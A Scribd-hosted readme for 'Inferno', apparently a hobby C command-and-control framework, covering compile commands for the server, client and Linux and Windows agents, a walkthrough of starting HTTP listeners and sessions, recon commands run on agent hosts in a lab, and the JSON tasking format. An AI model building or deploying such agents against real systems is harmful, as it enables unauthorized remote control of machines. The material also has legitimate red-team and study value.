Scribd
Upload
14 views5 pages

C 2

The document describes the functionalities and commands of the Cortex Security (CS) C2 system, which operates over TCP and HTTP. It provides detailed instructions on compiling the server and client, starting sessions, and executing commands within those sessions. Additionally, it highlights the ability to manage HTTP listeners and agents for both Linux and Windows systems, while noting some drawbacks such as an outdated readme.

Uploaded by

elobf7114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
14 views5 pages

C 2

The document describes the functionalities and commands of the Cortex Security (CS) C2 system, which operates over TCP and HTTP. It provides detailed instructions on compiling the server and client, starting sessions, and executing commands within those sessions. Additionally, it highlights the ability to manage HTTP listeners and agents for both Linux and Windows systems, while noting some drawbacks such as an outdated readme.

Uploaded by

elobf7114
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

Note

"Exploring the digital realm through C feels like journeying through the fiery
depths of Inferno with nothing but a trusty torch in hand. It's not just coding;
it's an adventure, where every line of C unlocks a new door to discovery in the
digital underworld."

Cortex Security (CS) C2


Client/Server channel over TCP
Server/Agent channel over HTTP
Listing HTTP listeners
Starting HTTP listeners
Stopping HTTP listeners
Listing HTTP sessions
Entering HTTP sessions
Destroying HTTP sessions
Switching sessions
Linux agent
Windows agent
Architecture
Inferno Architecture

Supported commands
Mode Command Example Description
HELP help / Show help menu
EXIT exit / Exit C2
LIST listeners listeners / List actives listeners
START listener http http 127.0.0.1 80 Start an HTTP listener
STOP listener stop stop http 1 Stop listener HTTP with ID 1
LIST sessions sessions / List actives sessions
ENTER session enter enter 1 Enter inside session with ID 1
DESTROY session kill kill 1 Destroy session with ID 1
Supported session commands
Mode Command Description
EXIT exit Exit session
WHOAMI whoami Get user login
HOSTNAME hostname Get machine hostname
LIST ls List files
DIRECTORY pwd Print current directory
CHANGE DIRECTORY cd Change the current directory
Some commands can be run with arguments

Manual
Compiling instructions
Navigate to the project directory and run:

gcc client.c -o client


gcc server.c -o server
gcc devil-lin.c -o devil-lin
i686-w64-mingw32-gcc -o devil-win.exe devil-win.c -lws2_32
More devil-lin with different ports 80, 8080, 8000 etc

Utilisation instructions
First you will need to start the server

┌──(asx㉿asx)-[~/Inferno]
└─$ ./server
Initializing socket...
Binding socket to Inferno address...
Listening to 127.0.0.1:33333
Accepting client...
Starting the server

Once the server is started it will listen on port 33333. Now you can start the
client

┌──(asx㉿asx)-[~/Inferno]
└─$ ./client

_ <-. (`-')_ (`-') _ (`-') <-. (`-')_


(_) \( OO) ) <-. ( OO).-/<-.(OO ) \( OO) ) .->
,-(`-'),--./ ,--/(`-')-----.(,------.,------,),--./ ,--/ (`-')----.
| ( OO)| \ | |(OO|(_\---' | .---'| /`. '| \ | | ( OO).-. '
| | )| . '| |)/ | '--. (| '--. | |_.' || . '| |)( _) | | |
(| |_/ | |\ | \_) .--' | .--' | . .'| |\ | \| |)| |
| |'->| | \ | `| |_) | `---.| |\ \ | | \ | ' '-' '
`--' `--' `--' `--' `------'`--' '--'`--' `--' `-----'

Info: X joined session


[>] Initializing socket...
[+] Socket initialized
[>] Connecting to server...
[+] Connected to server

[ASX]@[INFERNO]>
Starting the client

You will see the connection is accepted. Now you can start an HTTP listener on port
80

[ASX]@[INFERNO]> http 192.168.1.40 8080


[+] Result:
HTTP/1.0 200 OK
Starting an HTTP listener on port 8080

Lets start another listener on port 80.

[ASX]@[INFERNO]> http 192.168.1.40 80


[+] Result:
HTTP/1.0 200 OK
Starting another HTTP listener on port 80 Now we will list active listeners

[ASX]@[INFERNO]> listeners
[+] Result:
ID PROTOCOL ADDRESS PORT
== ======== ======= ====
1 http 192.168.1.40 8080
2 http 192.168.1.40 80
Listing our listeners

You can launch an agent by the following command:

┌──(asx㉿asx)-[~/Inferno]
└─$ ./devil-lin8080
Initializing socket...
Connecting...
Connected
Starting a linux agent
We can list our sessions

[ASX]@[INFERNO]> sessions
[+] Result:
ID COMMUNICATION REMOTE ADDRESS
== ============= ===========
1 http 192.168.1.40 8080
Linux session is ready

Now we can also launch a windows agent:

PS C:\Users\Administrator> ./a.exe
Hello ASX
Initializing socket...
Connecting...
Connected
Starting windows agent

We can list to see if session windows joined

[ASX]@[INFERNO]> sessions
[+] Result:
ID COMMUNICATION REMOTE ADDRESS
== ============= ===========
1 http 192.168.1.40 8080
2 http 192.168.1.40 80
Both linux and windows sessions are there showing there remote address

Now you can enter session to interact with agent, lets start with windows one

[ASX]@[INFERNO]> enter 2
[+] Result:
XXX
[+] Entering session
Entering the windows session

We will said multiple commands: whoami

[ASX]@[SESSION]> whoami
[>] Sending 6 bytes to server...
[>] Receiving 15 bytes from server...
[+] Result:
Administrator

[ASX]@[SESSION]>
pwd

[ASX]@[SESSION]> pwd
[>] Sending 3 bytes to server...
[>] Receiving 24 bytes from server...
[+] Result:
C:\Users\Administrator

[ASX]@[SESSION]>
hostname

[ASX]@[SESSION]> hostname
[>] Sending 8 bytes to server...
[>] Receiving 17 bytes from server...
[+] Result:
WIN-KIIR8T1ORA6

[ASX]@[SESSION]>
Now its time to send commands from linux

[ASX]@[SESSION]> exit
[>] Sending 4 bytes to server...

[ASX]@[INFERNO]>
[ASX]@[INFERNO]> enter 1
[+] Result:
XXX
[+] Entering session
[ASX]@[SESSION]> whoami
[>] Sending 6 bytes to server...
[>] Receiving 5 bytes from server...
[+] Result:
asx

[ASX]@[SESSION]>
Its now time to exit Inferno

[ASX]@[INFERNO]> exit
[>] Exiting Inferno...
[+] Exited
Exiting C2

Drawbacks
Note

Readme not updated to latest

Infos
Tip

You can analyze the content of the payload sent and received

==========START PAYLOAD==========
Receiving from client:
POST /endpoint HTTP/1.0
Host: inferno.com
Content-Type: application/json
Content-Length: 20
Connection: close

{'payload':'whoami'}
Sending to agent:

POST /endpoint HTTP/1.0


Host: inferno.com
Content-Type: application/json
Content-Length: 20
Connection: close
{'payload':'whoami'}
Received from agent: asx
Sending to client: asx
===========END PAYLOAD===========
Analyzing payload in server message

End of transmission

You might also like